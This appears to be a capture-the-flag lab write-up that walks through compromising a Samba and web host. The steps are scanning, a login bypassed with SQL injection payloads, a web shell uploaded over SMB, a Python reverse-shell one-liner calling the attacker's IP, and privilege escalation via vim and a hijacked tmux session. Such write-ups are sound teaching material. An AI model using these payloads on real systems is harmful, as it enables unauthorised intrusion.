- First we start with an nmap scan :
nmap -sC -sV -T4 <IP> -Pn
Nmap scan report for 10.10.144.47
Host is up (0.18s latency).
Not shown: 995 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open netbios-ssn Samba smbd 4.7.6-Ubuntu (workgroup: WORKGROUP)
8080/tcp open http Apache httpd 2.4.29 ((Ubuntu))
|_http-title: Apache2 Ubuntu Default Page: It works
|_http-server-header: Apache/2.4.29 (Ubuntu)
8082/tcp open http Node.js Express framework
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
9071/tcp filtered unknown
Service Info: Host: INCOGNITO
Host script results:
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
|_clock-skew: mean: 2s, deviation: 0s, median: 2s
| smb2-time:
| date: 2024-06-02T21:27:53
|_ start_date: N/A
|_nbstat: NetBIOS name: INCOGNITO, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| smb-os-discovery:
| OS: Windows 6.1 (Samba 4.7.6-Ubuntu)
| Computer name: incognito
| NetBIOS computer name: INCOGNITO\x00
| Domain name: \x00
| FQDN: incognito
|_ System time: 2024-06-02T21:27:53+00:00
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled but not required
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 34.01 seconds
- we have http 8080, 8082 and smb 139,445 services open. Let’s enumerate http first port 8080
it has a default Apachepage so letFUZZfor directory:
❯ ffuf -u "http://10.10.144.47:8080/FUZZ" -w /usr/share/dirb/wordlists/common.txt -fc 403
/'___\ /'___\ /'___\
/\ \__/ /\ \__/ __ __ /\ \__/
\ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
\ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
\ \_\ \ \_\ \ \____/ \ \_\
\/_/ \/_/ \/___/ \/_/
v2.1.0-dev
________________________________________________
:: Method : GET
:: URL : http://10.10.144.47:8080/FUZZ
:: Wordlist : FUZZ: /usr/share/dirb/wordlists/common.txt
:: Follow redirects : false
:: Calibration : false
:: Timeout : 10
:: Threads : 40
:: Matcher : Response status: 200-299,301,302,307,401,403,405,500
:: Filter : Response status: 403
________________________________________________
[Status: 200, Size: 10918, Words: 3499, Lines: 376, Duration: 163ms]
dev [Status: 301, Size: 317, Words: 20, Lines: 10, Duration: 141ms]
index.html [Status: 200, Size: 10918, Words: 3499, Lines: 376, Duration: 153ms]
index.php [Status: 200, Size: 4, Words: 1, Lines: 1, Duration: 225ms]
:: Progress: [4614/4614] :: Job [1/1] :: 252 req/sec :: Duration: [0:00:21] :: Errors: 0 ::
-
visiting the
/devdirectory with a browser i got aForbiddenerror:
-
Fuzzing for more hidden directories from the
/devdirectory and adding some extensions to fuzz with:
❯ ffuf -u http://10.10.144.47:8080/dev/FUZZ -w /usr/share/dirb/wordlists/common.txt -fc 403 -e .txt,.php,.bak
/'___\ /'___\ /'___\
/\ \__/ /\ \__/ __ __ /\ \__/
\ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
\ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
\ \_\ \ \_\ \ \____/ \ \_\
\/_/ \/_/ \/___/ \/_/
v2.1.0-dev
________________________________________________
:: Method : GET
:: URL : http://10.10.144.47:8080/dev/FUZZ
:: Wordlist : FUZZ: /usr/share/dirb/wordlists/common.txt
:: Extensions : .txt .php .bak
:: Follow redirects : false
:: Calibration : false
:: Timeout : 10
:: Threads : 40
:: Matcher : Response status: 200-299,301,302,307,401,403,405,500
:: Filter : Response status: 403
________________________________________________
note.txt [Status: 200, Size: 45, Words: 6, Lines: 2, Duration: 157ms]
:: Progress: [18456/18456] :: Job [1/1] :: 269 req/sec :: Duration: [0:01:23] :: Errors: 0 ::
-
Checking what in the
note.txtwith a browser:
-
enumerating the other http-server running on port
8082:
-
Fuzzing for directories:
❯ ffuf -u http://10.10.144.47:8082/FUZZ -w /usr/share/wordlists/dirb/common.txt -fc 403 -e .txt,.bak,.php
/'___\ /'___\ /'___\
/\ \__/ /\ \__/ __ __ /\ \__/
\ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
\ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
\ \_\ \ \_\ \ \____/ \ \_\
\/_/ \/_/ \/___/ \/_/
v2.1.0-dev
________________________________________________
:: Method : GET
:: URL : http://10.10.144.47:8082/FUZZ
:: Wordlist : FUZZ: /usr/share/wordlists/dirb/common.txt
:: Extensions : .txt .bak .php
:: Follow redirects : false
:: Calibration : false
:: Timeout : 10
:: Threads : 40
:: Matcher : Response status: 200-299,301,302,307,401,403,405,500
:: Filter : Response status: 403
________________________________________________
[Status: 200, Size: 11162, Words: 2014, Lines: 126, Duration: 178ms]
login [Status: 200, Size: 1605, Words: 352, Lines: 29, Duration: 153ms]
Login [Status: 200, Size: 1605, Words: 352, Lines: 29, Duration: 153ms]
static [Status: 301, Size: 179, Words: 7, Lines: 11, Duration: 159ms]
:: Progress: [18456/18456] :: Job [1/1] :: 280 req/sec :: Duration: [0:01:16] :: Errors: 0 ::
-
visiting the
/logindirectory with a browser:
- trying out default credentials it didn’t work so i research ways to bypass
log-informs and found a post listing alot ofSQLIpayloads to bypass the form:admin'/* admin' or '1'='1 admin' or '1'='1'-- admin' or '1'='1'# admin' or '1'='1'/* admin"or 1=1 or ""=" <---- This payload works admin' or 1=1 admin' or 1=1-- admin' or 1=1# admin' or 1=1/* admin') or ('1'='1 admin') or ('1'='1'-- admin') or ('1'='1'# -
i paste the payload
admin"or 1=1 or ""="in the username section and left the password section blank and boom it works:
- so now i have credentials what next?
- from the nmap scan earlier we have port
139 & 445open which are smb ports. - so i tried to connect and list share in the smb server using a NULL user:
❯ smbclient -L ////10.10.144.47 -N
- we have a share name
SECURED, so let’s try to log-in with the credentials we found earlier❯ smbclient //10.10.144.47/SECURED -U ArthurMorgan
- i noticed that the
note.txtfile in theSECURED Shareis exactly the same file in thehttp://10.10.144.47:8080/dev/note.txt -
we can upload a web-shell to the smb share:
-
let’s check it in the
/dev/webshell.phpdirectory on the web-service (8080):
- Now let gain a reverse shell:
python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.9.2.221",1337));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("sh")' - i start up my listener and execute the above python payload on the server:
- you can stable the shell with:
python3 -c 'import pty;pty.spawn("/bin/bash")' CTRL Z [KEY] stty raw -echo;fg export TERM=xterm stty rows 40 cols 160 -
we got a shell as
www-dataso we need to escalate our Privilege toArthurMorganand capture the user flag:
- i uploaded
linpeasto the target and run to look for more internal attack vectors:
- we can see the active ports, one of them stand out
4544let’s use nc to check what runs on the port:
It gaves us options to choose, after trying all the options, figured option 4 opens a vim editor, let’s try exploit vim to gain shell…
- GTF0bins
-
now let’s escalate privs to root… running linpeas again
- Hmm… There is a Tmux session which is owned by user
marston. -
I haven’t seen this before. Let’s go to HackTricks:
-
let’s check the tmux sessions available
-
now we can attack to it with
tmux attach-session -t 0: - it open alot of
tmuxwindows and i am not that familiar withtmuxso i was exiting the window one by one till i found something different 😂:
conclusion
What we’ve learned:
- Enumerating SMB
- Enumerating Hidden Directories and Files via
FFUF - Exploiting SQL Injection In Login Page
- Uploading PHP Webshell Via SMB
- Port Forwarding
- Password Spraying
- Vertical Privilege Escalation Via
vim - Horizontal Privilege Escalation Via Hijacking Tmux Session
Thanks For Reading 😉